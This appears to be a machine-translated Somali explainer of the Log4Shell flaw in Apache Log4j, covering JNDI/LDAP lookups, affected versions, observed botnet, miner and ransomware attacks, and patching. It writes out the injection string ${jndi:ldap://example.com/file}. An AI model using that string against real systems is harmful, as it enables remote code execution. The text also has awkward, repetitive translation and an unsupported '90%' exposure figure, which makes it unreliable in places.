Table of Contents[Qari][muuji]
Dabayaaqadii Noofambar 2021, waxaan daaha ka qaadnay khatar weyn oo dhanka amniga internetka ah. Ka faa'iidaysigani waxa uu saamayn ku yeelan karaa malaayiin nidaamyada kombiyuutarada adduunka oo dhan.
Kani waa hage ku saabsan nuglaanta Log4j iyo sida cilad nashqadaynta ee la ilduufay ay uga tagtay 90% adeegyada kombayutarka aduunka ee u furan in la weeraro.
Apache Log4j waa ilo-fure Java-ku-saleysan galitaanka oo ay soo saartay Apache Software Foundation. Asal ahaan waxaa qoray Ceki Gülcü sannadkii 2001, hadda waa qayb ka mid ah Adeegyada Logging Apache, mashruuca Apache Software Foundation.
Shirkadaha adduunka oo dhan waxay isticmaalaan maktabadda Log4j si ay awood ugu yeeshaan gelitaanka codsiyadooda. Dhab ahaantii, maktabadda Java waa meel kasta, waxaad ka heli kartaa codsiyada Amazon, Microsoft, Google, iyo in ka badan.
Caannimada maktabaddu waxay ka dhigan tahay in cillad kasta oo suurtagal ah oo ku jirta koodka ay ka tagi karto malaayiin kombuyuutar ah oo u furan in la jabsado. Noofambar 24, 2021, a amniga daruurta cilmi-baare u shaqeeya Alibaba ayaa ogaaday cillad xun.
Nuglaanta Log4j, oo sidoo kale loo yaqaan Log4Shell, ayaa jirtay iyada oo aan la dareemin ilaa 2013. Nuglaanta ayaa u ogolaatay jilayaasha xaasidnimada ah inay ku socodsiiyaan koodka nidaamyada ay saamaysay ee ku socda Log4j. Waxaa si guud loo shaaciyay Diisambar 9-keedii, 2021
Khubarada warshaduhu waxay ugu yeeraan cilladda Log4Shell nuglaanshaha ugu weyn ee xusuusta dhow.
Toddobaadkii ku xigay daabacaadda nuglaanta, kooxaha amniga internetka ayaa ogaaday malaayiin weerar. Cilmi-baarayaasha qaar ayaa xitaa arkay in ka badan boqol weerar daqiiqaddii.
Sidee u shaqeeyaan?
Si loo fahmo sababta Log4Shell u khatar badan tahay, waxaan u baahanahay inaan fahanno waxa ay awood u leedahay.
Nuglaanta Log4Shell waxay u oggolaanaysaa fulinta kood aan sabab lahayn, taas oo asal ahaan ka dhigan in weeraryahanku ku socodsiin karo amar kasta ama koodka mashiinka bartilmaameedka ah.
Sidee ayay tani u fulisaa?
Marka hore, waxaan u baahanahay inaan fahanno waxa uu JNDI yahay.
Interface-ka Magacaynta iyo Hagaha Java (JNDI) waa adeeg Java ah oo u oggolaanaya barnaamijyada Java in ay ogaadaan oo ay raadiyaan xogta iyo agabka iyagoo isticmaalaya magaca. Adeegyadan hagaha waa muhiim sababtoo ah waxay bixiyaan diiwaan habaysan oo horumariyayaashu si fudud u tixraacaan marka ay samaynayaan codsiyada.
JNDI waxay isticmaali kartaa hab-maamuusyo kala duwan si ay u gasho hage gaar ah. Mid ka mid ah hab-maamuusyadan waa Hab-raaca Helitaanka Hagaha Fudud, ama LDAP.
Markaad xidhid xadhig, log4j sameeyaa beddelka xargaha marka ay la kulmaan tibaaxaha foomka ${prefix:name}
.
Tusaale ahaan, Text: ${java:version}
waxaa loo gali karaa sidii Qoraal: Java nooca 1.8.0_65. Beddelka noocaan ah waa wax caadi ah.
Waxaan sidoo kale yeelan karnaa tibaaxo ay ka mid yihiin Text: ${jndi:ldap://example.com/file}
kaas oo isticmaala nidaamka JNDI si uu shay Java ka soo raro URL iyada oo loo marayo nidaamka LDAP.
Tani waxay si wax ku ool ah u shubaysaa xogta ka imanaysa URL-kaas mashiinka. Khabiir kasta oo suurtagal ah wuxuu martigelin karaa kood xaasidnimo URL dadweynaha wuxuuna sugi karaa mashiinnada isticmaalaya Log4j si ay u galaan.
Maaddaama waxa ku jira farriimaha loggu ay ka kooban yihiin xogta uu isticmaalo isticmaaluhu, hackers-ku waxa ay gelin karaan tixraacooda JNDI ee tilmaamaya adeegayaasha LDAP ee ay maamulaan. Adeegayaashan LDAP waxa ka buuxa walxo Java xaasidnimo leh oo ay JNDI ku fulin karto baylahda.
Waxa taas ka sii daraysa iyada oo aan dhib lahayn haddii codsigu yahay dhinac-server ama codsi dhinaca macmiilka ah.
Ilaa iyo inta ay jirto daw uu qofka wax qoraya u akhriyo koodka xaasidnimada ah ee weerarka, arjigu wali waa u furan yahay in laga faa'iidaysto.
Yaa saameynaya?
Nuglaanta waxay saamaysaa dhammaan nidaamyada iyo adeegyada adeegsada Apache Log4j, oo wata noocyada 2.0 ilaa iyo ay ku jiraan 2.14.1.
Dhowr khabiir oo amniga ah ayaa ku taliya in dayacanka uu saameyn karo tiro codsiyo ah oo isticmaalaya Java.
Ciladan ayaa markii ugu horeysay laga helay ciyaarta fiidyaha ee Minecraft ee ay Microsoft leedahay. Microsoft ayaa ku boorisay isticmaaleyaasheeda inay cusboonaysiiyaan barnaamijkooda Java Minecraft software si looga hortago khatar kasta.
Jen Easterly, Agaasimaha Hay’adda Ammaanka Internetka iyo Kaabayaasha Dhaqaalaha (CISA) ayaa sheegay in waratada ay leeyihiin masuuliyad weyn si looga hortago isticmaalayaasha dhamaadka jilayaasha xaasidnimada leh ee ka faa'iidaysanaya dayacanka.
"Iibiyeyaashu waa inay sidoo kale la xiriiraan macaamiishooda si ay u hubiyaan isticmaalayaasha ugu dambeeya inay ogaadaan in alaabtoodu ay ka kooban tahay baylahdan ayna tahay inay mudnaanta siiyaan cusbooneysiinta software."
Weerarada ayaa lagu soo waramayaa in ay bilowdeen. Symantec, oo ah shirkad bixisa software-ka internet-ka, ayaa fiirsatay tirooyin kala duwan oo codsiyo weerar ah.
Waa kuwan tusaalayaal ka mid ah noocyada weerarrada ay cilmi-baarayaashu ogaadeen:
- botnets
Botnets waa shabakad kombiyuutaro ah oo ay gacanta ku hayaan hal dhinac oo weerar ah. Waxay caawiyaan fulinta weerarrada DDoS, xado xogta, iyo khiyaamooyinka kale. Cilmi baadhayaashu waxay ku arkeen botnet-ka Muhstik ee qoraallada qolofka laga soo dejiyay ka faa'iidaysiga Log4j.
- XMRig Miner Trojan
XMRig waa il furan oo macdanta cryptocurrency ah oo adeegsata CPU-yada si ay u qoddo calaamadda Monero. Dembiilayaasha internetka waxay ku rakibi karaan XMRig aaladaha dadka si ay u isticmaalaan awoodooda farsamayn iyagoon aqoon u lahayn.
- Khonsari Ransomware
Ransomware waxaa loola jeedaa nooc ka mid ah malware-ka loogu talagalay sir faylasha kumbiyuutarka. Weeraryahanadu waxay markaa dalban karaan lacag bixinta si ay dib ugu soo celiyaan faylalka qarsoon. Cilmi baadhayaashu waxay ka heleen Khonsari ransomware weerarrada Log4Shell. Waxay bartilmaameedsadaan server-yada Windows waxayna adeegsadaan qaabka NET.
Maxaa dhacaya xiga?
Khubarada ayaa saadaaliyay inay qaadan karto bilo ama laga yaabee xitaa sanado in si buuxda loo hagaajiyo fowdada ay keentay nuglaanshaha Log4J.
Habkani waxa uu ku lug leeyahay in la cusboonaysiiyo nidaam kasta oo ay saamaysay iyada oo la raacayo nooc la dhejiyay. Xitaa haddii dhammaan nidaamyadan la dhejiyo, waxaa weli jirta khatarta soo socota ee suurtogalka ah ee suurtogalka ah ee suurtogalka ah ee laga yaabo in haakarisku ay horeba ugu dareen daaqadda in server-yadu u furnaayeen weerarka.
Dad badan oo xalalka iyo dhimista jira si looga hortago codsiyada in laga faa'iidaysto bug this. Nooca cusub ee Log4j 2.15.0-rc1 wuxuu beddelay goobo kala duwan si loo yareeyo nuglaanta.
Dhammaan sifooyinka isticmaalaya JNDI waa la curyaami doonaa si caadi ah sidoo kale fiirinta fog waa la xaddiday. Deminta qaabka raadinta ee dejinta Log4j ayaa kaa caawin doonta dhimista khatarta ka faa'iidaysiga suurtagalka ah.
Log4j ka baxsan, waxaa weli loo baahan yahay qorshe ballaadhan oo lagaga hortagayo ka faa'iidaysiga ilaha furan.
Horaantii bishii May, Aqalka Cad ayaa sii daayay warqad amarka fulinta kaas oo ujeedadiisu ahayd in lagu wanaajiyo amniga internetka ee qaranka. Waxaa ka mid ahaa bixinta biilka software-ka (SBOM) kaas oo asal ahaan ahaa dukumeenti rasmi ah oo ka kooban liis shay kasta oo loo baahan yahay si loo dhiso codsiga.
Tan waxaa ku jira qaybo ay ka mid yihiin ilo furan xirmooyinka, ku-tiirsanaanta, iyo API-yada loo isticmaalo horumarinta. In kasta oo fikradda SBOM-yadu ay waxtar u leedahay hufnaanta, ma run ahaantii ma caawinaysaa macaamilka?
Ku-tiirsanaanta cusboonaysiinta waxay noqon kartaa dhib aad u badan. Shirkaduhu waxay dooran karaan oo keliya inay bixiyaan wixii ganaax ah halkii ay khatar gelin lahaayeen waqti dheeri ah oo ay ku heli lahaayeen baakado kale. Waxa laga yaabaa in SBOM-yadani ay waxtar yeelan doonaan oo keliya haddii ay helaan baaxad ayaa xaddidan oo dheeraad ah.
Ugu Dambeyn
Arrinka Log4j waa ka badan yahay dhibaatada farsamada ee hay'adaha.
Hogaamiyayaasha ganacsigu waa inay ka warqabaan khataraha iman kara marka adeegayaashooda, alaabadooda, ama adeegyadooda ay ku tiirsan yihiin kood aan iyaga laftoodu ilaalinayn.
Ku tiirsanaanta ilo furan iyo codsiyada qolo saddexaad waxay had iyo jeer la timaadaa xoogaa khatar ah. Shirkaduhu waa inay tixgeliyaan ka shaqaynta xeeladaha yaraynta khatarta ka hor intaanay khataraha cusub soo bixin.
Inta badan shabakadu waxay ku tiirsan tahay software il furan oo ay hayaan kumanaan mutadawiciin ah oo adduunka oo dhan ah.
Haddii aan rabno inaan ka dhigno shabakad meel aamin ah, dawladaha iyo shirkadaha waa inay maalgeliyaan maalgelinta dadaallada il furan iyo hay'adaha amniga internetka sida CISA.
Leave a Reply